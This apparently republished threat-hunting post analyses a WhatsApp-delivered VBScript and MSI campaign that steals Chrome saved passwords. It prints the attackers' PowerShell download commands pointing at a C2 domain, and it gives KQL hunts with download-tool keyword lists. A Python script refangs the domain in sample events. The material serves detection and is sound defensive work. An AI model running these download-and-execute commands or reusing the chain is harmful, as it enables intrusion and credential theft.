WhatsApp malware campaign targeting Chrome credential vaults

This content originally appeared on DEV Community and was authored by Puneet Jena

While hunting for malicious PowerShell techniques, we identified anomalous behavior indicative of staged payload execution.

Initial Access & Delivery Chain Summary

  • Threat actors used WhatsApp as the initial access channel, messaging several employees of the organization to build rapport before sharing a malicious ZIP archive. Because the embedded VBScript cannot run on a phone, victims were steered to open the archive on their Windows endpoints, where they were tricked into executing the VBScript payload.
  • Running the VBScript kicked off a multi-stage delivery chain that:
    • Downloaded a second VBScript and an MSI installer from the C2 server varegjopeaks[.]com into the user's %TEMP% directory.
    • Ran the MSI silently through msiexec.exe; a further VBScript, installer.vbs (retrieved from the C2 as teste_obscado.vbs), was then executed from %TEMP%.
    • Established persistence by registering the installer script under the Run registry key, so it re-executes at every logon.
    • Downloaded a Python environment and ran a PowerShell script that determined the installed Chrome version and fetched the matching build of the official Chrome test automation driver; the driver must match the browser's major version, which is why the version check comes first.
    • Read and exfiltrated the credentials stored in Chrome's password vault and, thanks to the persistence, kept harvesting passwords as the user saved new ones.

Observed Malicious Execution Activity

WScript Executions

  • "wscript.exe" C:\Users\*\AppData\Local\Temp\baixa_sscado.vbs
  • "WScript.exe" C:\Users\*\AppData\Local\Temp\*.zip.0e6.vbs
  • "wscript.exe" C:\Users\*\AppData\Local\Temp\installer.vbs

(The * stands in for the user profile name and for the lure archive's file name.)

PowerShell Download Activity

  • "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/baixa_sscado.vbs' -OutFile $env:TEMP\baixa_sscado.vbs -UseBasicParsing"
  • "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/teste_obscado.vbs' -OutFile $env:TEMP\installer.vbs -UseBasicParsing"
  • "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/installer.msi' -OutFile $env:TEMP\installer.msi -UseBasicParsing"

Msiexec Execution

  • "msiexec.exe" /i C:\Users\*\AppData\Local\Temp\installer.msi /quiet /norestart

Detection query (Microsoft Defender advanced hunting, KQL):

Both queries return false positives (signed logon scripts, software-deployment tooling and other legitimate automation also spawn PowerShell downloads); validate and filter the results before acting on them.

// PowerShell download activity whose parent is the Windows Script Host
DeviceProcessEvents
| where InitiatingProcessFileName contains "wscript"
| where FileName contains "powershell.exe"
// has_any matches whole terms, so "http" and "https" are both needed;
// Invoke-WebRequest is included because that is the cmdlet observed in this campaign
| where ProcessCommandLine has_any ("-enc", "-encode", "http", "https", "Invoke-RestMethod", "Invoke-WebRequest", "New-Object Net.WebClient", "System.Net.HttpWebRequest", "DownloadFile", "curl", "wget", "iex", "iwr")
| distinct ProcessCommandLine, InitiatingProcessCommandLine

.vbs & .msi Execution Identification:

// Pair PowerShell download activity with a wscript/msiexec run of a .vbs or .msi
// on the same device within 60 seconds. The join is on DeviceName only, so every
// download on a host is paired with every script/installer run and the time
// window does the pruning. datetime_diff('minute') counts calendar-minute
// boundaries (23:00:59 to 23:01:00 is 1), so seconds are used for a true window.
DeviceProcessEvents
| where FileName contains "powershell.exe"
| where ProcessCommandLine has_any ("-enc", "-encode", "http", "https", "Invoke-RestMethod", "Invoke-WebRequest", "New-Object Net.WebClient", "System.Net.HttpWebRequest", "DownloadFile", "curl", "wget", "iex", "iwr")
| project DeviceName, T1 = Timestamp, ProcessCommandLine, InitiatingProcessCommandLine
| join kind=inner (
    DeviceProcessEvents
    | where ProcessCommandLine contains "wscript" or ProcessCommandLine contains "msiexec"
    | where ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs"
    | project DeviceName, T2 = Timestamp, ProcessCommandLine1 = ProcessCommandLine, InitiatingProcessCommandLine1 = InitiatingProcessCommandLine
) on DeviceName
| extend timedifference = abs(datetime_diff('second', T1, T2))
| where timedifference < 60
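The two hunts above re-implemented in Python so the matching logic can be exercised offline against a handful of process events. This is an added example, not code from the original post; field names mirror the Defender DeviceProcessEvents table, the events are constructed (hostname WS01, user alice, the invoice.zip.0e6.vbs lure name, the intranet.example and fileserver hosts, and all timestamps are invented), and the post's defanged indicators are refanged so they look like live telemetry. It also adds the Invoke-WebRequest term the observed command lines actually use, and keeps a deliberate false positive (a logon script running near an unrelated PowerShell web call) to show why the second hunt needs validation.

```python
"""Offline re-implementation of the two advanced-hunting queries above.

Added example, not code from the original post. Field names mirror the
Defender DeviceProcessEvents table; all sample events below are constructed.
"""
import re
from datetime import datetime, timedelta

# Download indicators from the KQL queries, plus the cmdlet seen in this campaign
DOWNLOAD_TERMS = ("-enc", "-encode", "http", "https", "Invoke-RestMethod",
                  "Invoke-WebRequest", "New-Object Net.WebClient",
                  "System.Net.HttpWebRequest", "DownloadFile", "curl", "wget",
                  "iex", "iwr")

# Network IOCs from the post, kept defanged; refang() makes them matchable
IOCS = ("varegjopeaks[.]com/altor/teste_obscado[.]vbs",
        "varegjopeaks[.]com/altor/baixa_sscado[.]vbs",
        "varegjopeaks[.]com")


def refang(ioc: str) -> str:
    """Undo common defanging so an indicator can be compared with live data."""
    return (ioc.replace("[.]", ".")
               .replace("hxxps://", "https://")
               .replace("hxxp://", "http://"))


def has_any(text: str, terms) -> bool:
    """Approximate KQL has_any: case-insensitive match on whole terms, so
    'http' does not match 'https://' (which is why the query lists both)."""
    for term in terms:
        pattern = r"(?<![A-Za-z0-9])" + re.escape(term) + r"(?![A-Za-z0-9])"
        if re.search(pattern, text, re.IGNORECASE):
            return True
    return False


def wscript_spawned_download(events):
    """First query: a PowerShell download whose parent is the Script Host."""
    return [e for e in events
            if "wscript" in e["InitiatingProcessFileName"].lower()
            and "powershell.exe" in e["FileName"].lower()
            and has_any(e["ProcessCommandLine"], DOWNLOAD_TERMS)]


def correlated_dropper_execution(events, window=timedelta(seconds=60)):
    """Second query: a PowerShell download and a wscript/msiexec run of a
    .vbs/.msi on the same host within the window. Joined on DeviceName only,
    exactly like the KQL, so unrelated activity on a busy host pairs up too."""
    downloads = [e for e in events
                 if "powershell.exe" in e["FileName"].lower()
                 and has_any(e["ProcessCommandLine"], DOWNLOAD_TERMS)]
    droppers = [e for e in events
                if re.search(r"wscript|msiexec", e["ProcessCommandLine"], re.I)
                and re.search(r"\.(vbs|msi)\b", e["ProcessCommandLine"], re.I)]
    return [(d["ProcessCommandLine"], x["ProcessCommandLine"])
            for d in downloads for x in droppers
            if d["DeviceName"] == x["DeviceName"]
            and abs(d["Timestamp"] - x["Timestamp"]) < window]


def ioc_hits(events):
    """Rows whose command line references one of the post's network IOCs."""
    needles = [refang(i).lower() for i in IOCS]
    return [e for e in events
            if any(n in e["ProcessCommandLine"].lower() for n in needles)]


def event(ts, parent, name, cmd, device="WS01"):
    return {"Timestamp": ts, "DeviceName": device, "FileName": name,
            "ProcessCommandLine": cmd, "InitiatingProcessFileName": parent}


T0 = datetime(2025, 11, 10, 10, 0, 0)              # constructed
TEMP = r"C:\Users\alice\AppData\Local\Temp"          # constructed user
LURE = f'"wscript.exe" {TEMP}\\invoice.zip.0e6.vbs'  # stand-in for *.zip.0e6.vbs
PS = '"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri '

SAMPLE_EVENTS = [
    event(T0, "explorer.exe", "wscript.exe", LURE),
    event(T0 + timedelta(seconds=5), "wscript.exe", "powershell.exe",
          PS + "'https://varegjopeaks.com/altor/baixa_sscado.vbs' "
               '-OutFile $env:TEMP\\baixa_sscado.vbs -UseBasicParsing"'),
    event(T0 + timedelta(seconds=7), "wscript.exe", "powershell.exe",
          PS + "'https://varegjopeaks.com/altor/installer.msi' "
               '-OutFile $env:TEMP\\installer.msi -UseBasicParsing"'),
    event(T0 + timedelta(seconds=20), "wscript.exe", "msiexec.exe",
          f'"msiexec.exe" /i {TEMP}\\installer.msi /quiet /norestart'),
    # Benign noise five minutes later: a health check and a domain logon script
    event(T0 + timedelta(minutes=5), "svchost.exe", "powershell.exe",
          '"powershell.exe" -c "Invoke-RestMethod https://intranet.example/health"'),
    event(T0 + timedelta(minutes=5, seconds=30), "explorer.exe", "wscript.exe",
          r'"wscript.exe" \\fileserver\netlogon\logon.vbs'),
]

if __name__ == "__main__":
    for e in wscript_spawned_download(SAMPLE_EVENTS):
        print("wscript -> powershell download:", e["ProcessCommandLine"])
    for d, x in correlated_dropper_execution(SAMPLE_EVENTS):
        print("paired within 60 s:", d[:45], "...", x[:45])
    for e in ioc_hits(SAMPLE_EVENTS):
        print("IOC hit:", e["ProcessCommandLine"])
```

Against the constructed events the parent-child hunt returns only the two downloads spawned by the lure script, while the time-window hunt returns five pairs, one of which is the logon script paired with an unrelated health check; that is the false-positive class the post warns about, and adding the parent-process constraint or a path filter on %TEMP% is the usual way to trim it.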

Reference:

IOC

File hashes (SHA-256):
  • 36805f82166acf711007ab42e0e4147c10c7639fbf94eac9a1d26401e91a26ea
  • 8041b6cdeb3a4502066d18d024e671577dda23d4a1e4d083f34fcbfa39469279

Network indicators:
  • varegjopeaks[.]com/altor/teste_obscado[.]vbs
  • varegjopeaks[.]com/altor/baixa_sscado[.]vbs
  • varegjopeaks[.]com


Republished on Sciencx, 2025-11-16: https://www.scien.cx/2025/11/16/whatsapp-malware-campaign-targeting-chrome-credential-vaults/